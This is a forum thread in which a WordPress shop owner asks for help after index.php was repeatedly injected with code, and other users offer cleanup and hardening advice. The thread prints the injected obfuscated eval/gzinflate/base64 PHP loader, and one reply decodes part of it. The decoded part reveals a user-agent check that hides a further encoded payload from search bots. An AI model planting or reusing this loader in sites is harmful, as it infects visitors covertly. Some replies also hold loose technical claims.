Site was hacked...need help bad!

[SoCalGaming]

Hi everyone,

I'm new here! Well long story short, I run a small online store hosted by GoDaddy using wordpress. My site got hacked and I have no idea what to do. :[ If anyone knows how to fix the root of this problem, please let me know. I really need help here! (And yes, if it's something that takes work I can even offer some cash).


Domain: www.socalgaming.com

Description of problem:

When I went to check out the files on the server, I noticed the index.php file had been edited, and the following script was placed in the file:

<?php eval(gzinflate(base64_decode('AFAGr/lpZiAoIWlzc2V0KCRmdGwpKXsgZ2xvYmFsICRmdGw7JGZ0bD0xOw0KCQllcnJvcl9yZXBvcnRpbmcoMCk7DQoJCWlmKCFwcmVnX21hdGNoKCcjYm90fHNwaWRlcnxjcmF3bHxzbHVycHx5YW5kZXgjaScsICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSkpew0KCQlwcmludChnemluZmxhdGUoYmFzZTY0X2RlY29kZSgnN0wwSFlCeEpsaVVtTDIzS2UzOUs5VXJYNEhTaENJQmdFeVRZa0VBUTdNR0l6ZWFTN0IxcFJ5TXBxeXFCeW1WV1pWMW1Ga0RNN1oyODk5NTc3NzMzM252dnZmZTZPNTFPSi9mZi96OWNabVFCYlBiT1N0ckpuaUdBcXNnZlAzNThIejhpSGpmVHVsaTFSNWVmZlhTWmZmVEpSK1ZIaDIxOS9Zdnp5VVdUMTVOUFBqbjhKZE9zbmM2M21tV2RYOVR2N3Z4aWZMdjFSZGJPUC9ub296dGJkL1RySDdTVHZMM3ppeGVmNFp2RC9QS3pxMkk1cTY2Kzl4R0J6RC82NVBMN2g3L2svUHl6ajg3cmFuRkNIODJ6anc2TDg2MmR2WjNQUHR0NXQ3dHo1L3o4azg4K3F2RlZOY3MvT2x4Kzl0SGUvVi80Qy9jKy9ZVy9jSGR2bC83WmZmZ0xmK0grd1MvOGhmY2Y0QS8rK0FDL1VhUGRlL3Y0RTcvdDRqTis2ZDY5WC9nTFA5M0RYenY0L0lGK2RIRGZObjFnbXNwdjNHSlAvem5nWHdCc2gxOUhCOERnSWI5NXozOFRDTjNuanhuMEEvMTQ5eDQrLzFRUjNpRlFuektRSGYxa24zN1pleWdqN0k5MDk1N3QxbzNybnI2TC96LzROSHg5ZDM5UDZLTWt3SnM4R3VDeXp4RHBIMEF3blhsRXNDUzlGNHpNMGVSVGZINlBTUTBNR1UxdWF3bEFnQjg4TUY4TmpZRHhFeHJ6bDUvS1MvZDU2UGlFWVhJRGpPM0J2aENOZTVjcFozQThyUHY2SjgveDBKZUtya1VITENOTVllakovVW9IYU1YRFpnb0NwTXdZTitWaGhkUmh3aGhjQlgvR21udGpYSGExS1FiNVlFZitmOTlONXdCTXRQNzBRRnJLelBGdzdEaGxrZ0JPRzMycXFJS09UR0xic2I3MTBIekc0SWZlc3N3dmpMOW5CbStuU0FiRkRYYk5iN3YyTTBkK0MrTUJmMlE1Um9qTFkrVU9NUDFXa0dWR0xGeGhBdjdIY0NKRDI3WC8zSE5mTW1QZU0vOHd4UzFEeUdRZTZKZk1VdFQ4Z1gxRklCaHUwNjh3M0FjNmRHWU9HZXZBckdIR0lRRDNEK1J0WDhwMjkzYzdId2lVZlF1QUtkc2ZyVXprcG03NU05WXczQ0FtM3N3NS9CYmFpbnA0S0w5Z2VQTEJlNmdBMGJadUxwMldPYmlOYXJXcWN1TzRlRWhtRHRIb1V6TUFmV1hQNkdmK2g3L2NzVUFacFFBdmhzZEQyelgvWUJ6NDZOTWQvZXBIMnNmQTlMV1BZV2pHampzYjBoSHlKUS9jNkJsRndINjI1NzVsT2dNcjdXZXpqbUJodkQwV1FnOHpISzlINmNSQXRYM2ZVcU84THhaV0RzUVk3cmtlb1dUd004TGZsakx1ZmZuU2NnMyt1UVdnRHhRVUo2Tk9KZXpJbDBaa1B2VVFHT0FUNTNTNXNmR1hicllqZExZNndySkR4SWpkaE1rSE9Ub2lpNWFDVnJxRkk2MEU3VmxBR05DQm5ib2RKMW1FeFVQTFh2Wk5TMmY1R0xBRUtaMVgxdWM3RDJSVXV6c1BEVm9NOHFGOXhlS0FJWEQzVG95a0wvUmpWTXFBY2ZwbzNLektvdDM2NkJmK3dvL3VITTQvMnp0c1B2dUlYZlBGbmZPcTNpbysyemtzdGovZHUvKzc0cGZQZGo4cDd2eml0NThWYUNBTy9uaFdUZGVMZk5uZWFUNzU3SFZiRjh1TDc1MmZmMzlyK2IzaSs5dnc3ejhwZnZmNW5UdUh2K1FIbnpYaThlOSt4aTcvN3AzOGN1c0g5TVhqdXhxQi9EOEJBQUQvL3c9PScpKSk7DQoJCX0NCn0NCgEAAP//')));?>

I erased this script, re-uploaded the file, and the site was restored to how it was before. I changed the GoDaddy account password and the FTP account password to avoid this happening again. However, within 24 hours of this, the site was crashed again and the same script had been placed in the index.php file.


So yeah, obviously not sure what to do or how to find the problem. If anyone knows anything, or wants to help and possibly earn some cash, please let me know!

Thanks,
Chris G
SoCalGaming
christiang@yahoo.com

 

[Froomple]

You are probably keylogged. Try formatting everything and scan your PC for viruses. Once done, install KeyScrambler, change your passwords and try reverting to your old backup. Should work fine.

 

[Tango]

I would check the plugin that uses pluggable.php

Warning: Cannot modify header information - headers already sent by (output started at /home/content/99/8686399/html/store/index.php(1) : eval()'d code:5) in /home/content/99/8686399/html/store/wp-includes/pluggable.php on line 866

http://blog.sucuri.net/2012/08/wordpress-pluggable-php-being-compromised.html


Edit, its a wordpress core file, have you upgraded to the latest version? if not do it now.

 

[daniel0cean]

The warning message you see is due to a blank line at the beginning or end of one of your files. PHP does not like blank lines.
Also it may mean that some of your files are still infected and you could get more malware. I can tell you from experience that you probably have been exploited through a weak password or Wordpress vulnerability and there is surely a backdoor script on your account. If you want more details or assistance let me know and I can provide you with my knowledge further.
I do cleanups on infected sites on a daily basis.

 

[SoCalGaming]

Thanks for all the help guys! I'm doing my best to try and understand what all this means, but everything will be passed onto my IT guy. Hopefully we can figure this out ASAP.

 

[F A S T E R]

If you have FTP & SQL backups no worry about it.

Now this Error MSG comes

"Reported Attack Page!
This web page at ur domai has been reported as an attack page and has been blocked based on your security preferences."

 

[masterb56]

Unlike the previous post, you should worry about it.

Get an sql backup immediately. Then hunt for another wordpress theme. After that reformat your vps/server (Are you on a shard host?). Then start again with the new theme and the old sql file.

 

[SoCalGaming]

Does anyone suggest a site/service I can hire to clean the site and return it to the way it ways/listings back on google?

 

[Ifirst]

Dude your site was hacked the following way
One of your plugins is vulnerable to file upload vulnerability , the hacker uploaded its malicious file(his own index.php) and then defaced your site
Solution : Fix your security
Its nothing related to godaddy, its wordpress
1.Update to latest versions
2.Triple check your plugins and update them all
3.Change your wordpress admin password
4.Do a check on your server to see if hacker uploaded a backdoor shell to the site , check if any php file have been backdoored
You are good to go

 

[ReverseHosts]

Update your WP to latest version. After that scan for viruses. Then change all your passwords to at least 12 char randomly generated passowords. Why? Because they are REALLY hard to crack (if hes getting your password hash in the first place, which I doubt)

 

[Mr.WT]

i think ur site isnt hacked its infected i face that prob also

 

[SoCalGaming]

If anyone would like to give this a shot and fix our site, we will be willing to compensate with some pay. Please email me for details.

 

[sambaker]

My site was infected too. What I did is installed this plugin http://wordpress.org/extend/plugins/wordfence/ purchase the premium options and run it. Without this plugin, it was a tedious task to find the infected files and delete it manually.

I'm not affiliate at all with the plugin developer, just trying to help from my experience.

Besides php files, if you run cache plugin, you cache files infected too.

 

[VuVu]

This could easily not be his / her problem. If the server in which he is hosted on has bad security measures another site could of been infected and is running rampant on the server. Do you know what security practices that GoDaddy uses on this server in question? GoDaddy has had some security problems in the past so it could possibly be that. To start helping you on this now. As others suggested is your wordpress up to date? Are all the plugins you have installed up to date? If so then this (if it's another site) could be a 0day exploit. If this is another sites vulnerability then you should be asking GoDaddy if they are using suphp, suhosin, open_basedir, etc. It wouldn't hurt to upload a php.ini file to have a look to see if php isn't outdated as I have seen some uppity up hosts use ancient php versions *cough* hostgaotr *cough*.

@Sambaker's solution could work for you as well, but if it's another site that has the vulnerability it might not work.

If you are still having problems and cannot seem to find help you can send me a pm and I can hopefully help you more. There are security audit IT companies out there but on a shared environment it could be hard to chase down.

Edit: If you're running any type of sales script you should also be backing up your site atleast daily,

http://www.hotscripts.com/listing/backup-sites-and-dbs/

 

[nasavsisro]

This is Base 64 Code After Decode i fount this on script

�Pif (!isset($ftl)){ global $ftl;$ftl=1;
		error_reporting(0);
		if(!preg_match('#bot|spider|crawl|slurp|yandex#i', $_SERVER['HTTP_USER_AGENT'])){
		print(gzinflate(base64_decode('7L0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8iHjfTuli1R5effXSZffTJR+VHh219/YvzyUWT15NPPjn8JdOsnc63mmWdX9Tv7vxifLv1RdbOP/nooztbd/TrH7STvL3zixef4ZvD/PKzq2I5q66+9xGBzD/65PL7h7/k/Pyzj87ranFCH82zjw6L862dvZ3PPtt5t7tz5/z8k88+qvFVNcs/Olx+9tHe/V/4C/c+/YW/cHdvl/7ZffgLf+H+wS/8hfcf4A/++AC/UaPde/v4E7/t4jN+6d69X/gLP93DXzv4/IF+dHDfNn1gmspv3GJP/zngXwBsh19HB8DgIb95z38TCN3njxn0A/149x4+/1QR3iFQnzKQHf1kn37Zeygj7I90957t1o3rnr6L/z/4NHx9d39P6KMkwJs8GuCyzxDpH0AwnXlEsCS9F4zM0eRTfH6PSQ0MGU1uawlAgB88MF8NjYDxExrzl5/KS/d56PiEYXIDjO3BvhCNe5cpZ3A8rPv6J8/x0JeKrkUHLCNMYejJ/UoHaMXDZgoCpMwYN+VhhdRhwhhcBX/GmntjXHa1KQb5YEf+f99N5wBMtP70QFrKzPFw7DhlkgBOG32qqIKOTGLbsb710HzG4IfesswvjL9nBm+nSAbFDXbNb7v2M0d+C+MBf2Q5RojLY+UOMP1WkGVGLFxhAv7HcCJD27X/3HNfMmPeM/8wxS1DyGQe6JfMUtT8gX1FIBhu068w3Ac6dGYOGevArGHGIQD3D+RtX8p293c7HwiUfQuAKdsfrUzkpm75M9Yw3CAm3sw5/Bbainp4KL9gePLBe6gA0bZuLp2WObiNarWqcuO4eEhmDtHoUzMAfWXP6Gf+h7/csUAZpQAvhsdD2zX/YBz46NMd/epH2sfA9LWPYWjGjjsb0hHyJQ/c6BlFwH62575lOgMr7WezjmBhvD0WQg8zHK9H6cRAtX3fUqO8LxZWDsQY7rkeoWTwM8LfljLuffnScg3+uQWgDxQUJ6NOJezIl0ZkPvUQGOAT53S5sfGXbrYjdLY6wrJDxIjdhMkHOToii5aCVrqFI60E7VlAGNCBnbodJ1mExUPLXvZNS2f5GLAEKZ1X1uc7D2RUuzsPDVoM8qF9xeKAIXD3ToykL/RjVMqAcfpo3KzKot366Bf+wo/uHM4/2ztsPvuIXfPFnfOq3io+2zkstj/du/+74pfPdj8p7vzit58VaCAO/nhWTdeLfNneaT757HVbF8uL752ff39r+b3i+9vw7z8pfvf5nTuHv+QHnzXi8e9+xi7/7p38cusH9MXjuxqB/D8BAAD//w==')));
		}
}

��

 

[SoCalGaming]

No idea what that means haha. Is that bad?

 

[Ifirst]

@SoCalGaming
I am currently busy these days , i have not time
I am sure you will find someone else to help you
Follow the guidelines i said above

 

[SoCalGaming]

Thanks again to everyone who has helped. I think the Malware has been removed, but I'm having issues getting GoDaddy to approve my site and having my site re-submitted to Google. If anyone wants to go ahead and help me out w/that, please send me a message.

 

[Ifirst]

Well go to your google webmaster account and resubmit your sitemap
Wait for 24 hours and your site will appear in search result @ google

 

[SoCalGaming]

How do I double check to make sure there is no more malware on the site? And what exactly do I write in the summary when I request Google to resubmit the site. I want to play this as safe as possible.